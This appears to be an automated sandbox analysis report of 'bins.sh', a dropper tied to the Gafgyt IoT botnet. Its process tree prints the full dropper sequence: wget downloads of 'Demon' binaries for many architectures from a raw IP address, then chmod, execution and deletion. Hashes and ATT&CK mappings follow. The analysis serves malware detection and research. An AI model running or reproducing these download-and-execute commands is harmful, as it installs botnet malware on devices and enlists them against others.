Analysis
-
max time kernel
22s -
max time network
23s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
19-10-2024 11:41
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral8
Sample
bins.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
bins.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
bins.sh
-
Size
2KB
-
MD5
a754f4cf9d6ba2d574cd90bf04d1bc35
-
SHA1
b0191e89c26057b6132f3314fa685e1879c7dc62
-
SHA256
bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
-
SHA512
600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Malware Config
Signatures
-
Detected Gafgyt variant 1 IoCs
Processes:
resource yara_rule /tmp/Demon.mips family_gafgyt -
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 751 chmod 762 chmod 767 chmod 777 chmod 786 chmod 800 chmod 812 chmod 852 chmod 857 chmod 828 chmod 846 chmod 862 chmod 867 chmod 772 chmod -
Executes dropped EXE 1 IoCs
Processes:
Demon.mipsioc pid process /tmp/Demon.mips 753 Demon.mips -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
Demon.mipsdescription ioc process File opened for reading /proc/net/route Demon.mips -
Changes its process name 1 IoCs
Processes:
Demon.mipsdescription pid process Changes the process name, possibly in an attempt to hide itself 753 Demon.mips -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
Demon.mipsdescription ioc process File opened for reading /proc/net/route Demon.mips -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetDemon.mipsrmpid process 731 wget 753 Demon.mips 756 rm -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc process File opened for modification /tmp/Demon.x86 wget File opened for modification /tmp/Demon.i686 wget File opened for modification /tmp/Demon.mips wget File opened for modification /tmp/Demon.mpsl wget File opened for modification /tmp/Demon.sh4 wget File opened for modification /tmp/Demon.m68k wget File opened for modification /tmp/Demon.sparc wget File opened for modification /tmp/Demon.arm4 wget File opened for modification /tmp/Demon.arm5 wget File opened for modification /tmp/Demon.arm7 wget File opened for modification /tmp/Demon.arm6 wget File opened for modification /tmp/Demon.ppc wget File opened for modification /tmp/Demon.i586 wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:728
-
/usr/bin/wgetwget http://38.123.149.216/Demon.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731 -
/bin/chmodchmod +x Demon.mips2⤵
- File and Directory Permissions Modification
PID:751 -
/tmp/Demon.mips./Demon.mips2⤵
- Executes dropped EXE
- Reads system routing table
- Changes its process name
- Reads system network configuration
- System Network Configuration Discovery
PID:753 -
/bin/rmrm -rf Demon.mips2⤵
- System Network Configuration Discovery
PID:756 -
/usr/bin/wgetwget http://38.123.149.216/Demon.mpsl2⤵
- Writes file to tmp directory
PID:758 -
/bin/chmodchmod +x Demon.mpsl2⤵
- File and Directory Permissions Modification
PID:762 -
/tmp/Demon.mpsl./Demon.mpsl2⤵PID:763
-
/bin/rmrm -rf Demon.mpsl2⤵PID:765
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sh42⤵
- Writes file to tmp directory
PID:766 -
/bin/chmodchmod +x Demon.sh42⤵
- File and Directory Permissions Modification
PID:767 -
/tmp/Demon.sh4./Demon.sh42⤵PID:768
-
/bin/rmrm -rf Demon.sh42⤵PID:770
-
/usr/bin/wgetwget http://38.123.149.216/Demon.x862⤵
- Writes file to tmp directory
PID:771 -
/bin/chmodchmod +x Demon.x862⤵
- File and Directory Permissions Modification
PID:772 -
/tmp/Demon.x86./Demon.x862⤵PID:773
-
/bin/rmrm -rf Demon.x862⤵PID:775
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm62⤵
- Writes file to tmp directory
PID:776 -
/bin/chmodchmod +x Demon.arm62⤵
- File and Directory Permissions Modification
PID:777 -
/tmp/Demon.arm6./Demon.arm62⤵PID:778
-
/bin/rmrm -rf Demon.arm62⤵PID:780
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i6862⤵
- Writes file to tmp directory
PID:781 -
/bin/chmodchmod +x Demon.i6862⤵
- File and Directory Permissions Modification
PID:786 -
/tmp/Demon.i686./Demon.i6862⤵PID:787
-
/bin/rmrm -rf Demon.i6862⤵PID:790
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc2⤵
- Writes file to tmp directory
PID:792 -
/bin/chmodchmod +x Demon.ppc2⤵
- File and Directory Permissions Modification
PID:800 -
/tmp/Demon.ppc./Demon.ppc2⤵PID:801
-
/bin/rmrm -rf Demon.ppc2⤵PID:804
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i5862⤵
- Writes file to tmp directory
PID:805 -
/bin/chmodchmod +x Demon.i5862⤵
- File and Directory Permissions Modification
PID:812 -
/tmp/Demon.i586./Demon.i5862⤵PID:814
-
/bin/rmrm -rf Demon.i5862⤵PID:817
-
/usr/bin/wgetwget http://38.123.149.216/Demon.m68k2⤵
- Writes file to tmp directory
PID:818 -
/bin/chmodchmod +x Demon.m68k2⤵
- File and Directory Permissions Modification
PID:828 -
/tmp/Demon.m68k./Demon.m68k2⤵PID:830
-
/bin/rmrm -rf Demon.m68k2⤵PID:833
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sparc2⤵
- Writes file to tmp directory
PID:835 -
/bin/chmodchmod +x Demon.sparc2⤵
- File and Directory Permissions Modification
PID:846 -
/tmp/Demon.sparc./Demon.sparc2⤵PID:847
-
/bin/rmrm -rf Demon.sparc2⤵PID:849
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm42⤵
- Writes file to tmp directory
PID:851 -
/bin/chmodchmod +x Demon.arm42⤵
- File and Directory Permissions Modification
PID:852 -
/tmp/Demon.arm4./Demon.arm42⤵PID:853
-
/bin/rmrm -rf Demon.arm42⤵PID:855
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm52⤵
- Writes file to tmp directory
PID:856 -
/bin/chmodchmod +x Demon.arm52⤵
- File and Directory Permissions Modification
PID:857 -
/tmp/Demon.arm5./Demon.arm52⤵PID:858
-
/bin/rmrm -rf Demon.arm52⤵PID:860
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm72⤵
- Writes file to tmp directory
PID:861 -
/bin/chmodchmod +x Demon.arm72⤵
- File and Directory Permissions Modification
PID:862 -
/tmp/Demon.arm7./Demon.arm72⤵PID:863
-
/bin/rmrm -rf Demon.arm72⤵PID:865
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc440fp2⤵PID:866
-
/bin/chmodchmod +x Demon.ppc440fp2⤵
- File and Directory Permissions Modification
PID:867 -
/tmp/Demon.ppc440fp./Demon.ppc440fp2⤵PID:868
-
/bin/rmrm -rf Demon.ppc440fp2⤵PID:869
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
211KB
MD5455a2acf75de8da6ab7c4d9564cc69f9
SHA19e6016c6581289e685bcd6392bbf0bcf6b1182ff
SHA256b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
SHA512a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab